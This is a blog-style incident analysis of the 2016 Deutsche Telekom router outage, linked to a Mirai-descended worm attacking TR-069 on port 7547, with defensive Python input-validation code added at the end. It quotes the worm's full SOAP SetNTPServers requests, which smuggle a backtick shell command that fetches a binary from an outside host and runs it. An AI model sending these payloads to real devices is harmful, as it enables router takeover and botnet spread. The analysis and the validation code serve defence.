[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759
The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/
which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html
[/Update]
Many Deutsche Telekom customers in Germany had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server on their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom put out a lot of misleading and conflicting information. The events are summarized here:
https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html
I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/
From everything I have seen, it seems that some attacker sends a TR-069 XML command like this:

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
          <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
          <NewNTPServer2/>
          <NewNTPServer3/>
          <NewNTPServer4/>
          <NewNTPServer5/>
        </u:SetNTPServers>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
I am still trying to find out whether this comes from inside the Telekom network or from outside. The number of access requests has been declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/
It seems that Telekom now blocks TCP port 7547 from the outside.
The URL seems to differ a bit. The server currently has the IP 212.92.127.146; people say it used to be 188.209.49.168 (see https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).
Anyway, this obviously tries to inject shell commands via a bug first described here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/
First of all, this changes the DNS server to some bullshit, which explains the DNS problems. Second, it loads a MIPS binary (SHA1: 60b0b1631b1c7112b34f6850f60fc62e95174428) into the ramdisk in /tmp and executes it. If the binary does not install anything permanently, the show is over after a reboot, so that phenomenon is explained as well.
But now, what does the binary do? I have only looked at the strings output so far. One thing it does is disable the TR-069 port via
iptables -A INPUT -p tcp --destination-port 7547 -j DROP
and it sends some status information to a receiver that is (for me) still unknown; the relevant strings are:

    POST / HTTP/1.1
    Myname--is:
    Host:
    Cookie:
    http url=
There is at least a second version of the binary (SHA1: feb6531b4509015a3a119f67b290175b284e9864) that additionally disables the locally running telnet daemon and seems to replicate itself via two different URLs:

    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7547
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 526

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
          <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1>
          <NewNTPServer2></NewNTPServer2>
          <NewNTPServer3></NewNTPServer3>
          <NewNTPServer4></NewNTPServer4>
          <NewNTPServer5></NewNTPServer5>
        </u:SetNTPServers>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>

    POST /UD/act?1 HTTP/1.1
    Host: 127.0.0.1:7547
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
    SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
    Content-Type: text/xml
    Content-Length: 526

    <?xml version="1.0"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
          <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
          <NewNTPServer2></NewNTPServer2>
          <NewNTPServer3></NewNTPServer3>
          <NewNTPServer4></NewNTPServer4>
          <NewNTPServer5></NewNTPServer5>
        </u:SetNTPServers>
      </SOAP-ENV:Body>
    </SOAP-ENV:Envelope>
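As an added example (my own code, not from this post, from Telekom or from any router firmware), here is the input validation a SetNTPServers handler should apply before the value ever reaches a shell, and which a monitor in front of port 7547 can use to flag the requests quoted above: only an empty value, an IP literal or a plain hostname is accepted, so the backtick payload is rejected. The sample envelopes are constructed to match the shape of the requests above; ntp.example.net is a placeholder hostname.

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TIME_NS = "urn:dslforum-org:service:Time:1"
# One DNS label per RFC 1123: alphanumerics and '-', no leading/trailing '-'.
_LABEL = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_ntp_server(value: str) -> bool:
    """Accept an empty value (unset), an IP literal or a plain hostname; reject all else."""
    value = value.strip()
    if value == "":
        return True
    try:
        ipaddress.ip_address(value)  # IPv4 or IPv6 literal
        return True
    except ValueError:
        pass
    if len(value) > 253:
        return False
    return all(_LABEL.match(label) for label in value.rstrip(".").split("."))


def check_set_ntp_servers(soap_xml: str) -> list:
    """Return (element, value) pairs of a SetNTPServers request that fail validation."""
    root = ET.fromstring(soap_xml)
    action = root.find(f"{{{SOAP_NS}}}Body/{{{TIME_NS}}}SetNTPServers")
    if action is None:
        return []  # not a SetNTPServers call; nothing to check here
    return [(child.tag, child.text or "") for child in action
            if child.tag.startswith("NewNTPServer")
            and not is_valid_ntp_server(child.text or "")]


def _soap_request(server1: str) -> str:
    """Constructed sample envelope in the shape of the port 7547 requests above."""
    return ('<?xml version="1.0"?>'
            f'<SOAP-ENV:Envelope xmlns:SOAP-ENV="{SOAP_NS}"><SOAP-ENV:Body>'
            f'<u:SetNTPServers xmlns:u="{TIME_NS}">'
            f'<NewNTPServer1>{server1}</NewNTPServer1><NewNTPServer2/>'
            '</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>')


BENIGN_REQUEST = _soap_request("ntp.example.net")  # placeholder hostname
INJECTED_REQUEST = _soap_request("`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`")

if __name__ == "__main__":
    print("benign:", check_set_ntp_servers(BENIGN_REQUEST))      # []
    print("injected:", check_set_ntp_servers(INJECTED_REQUEST))  # [('NewNTPServer1', '`cd /tmp;...`')]
```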
In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR-069 port, hoping to be faster than the attackers. I'm still trying to get confirmation of this :).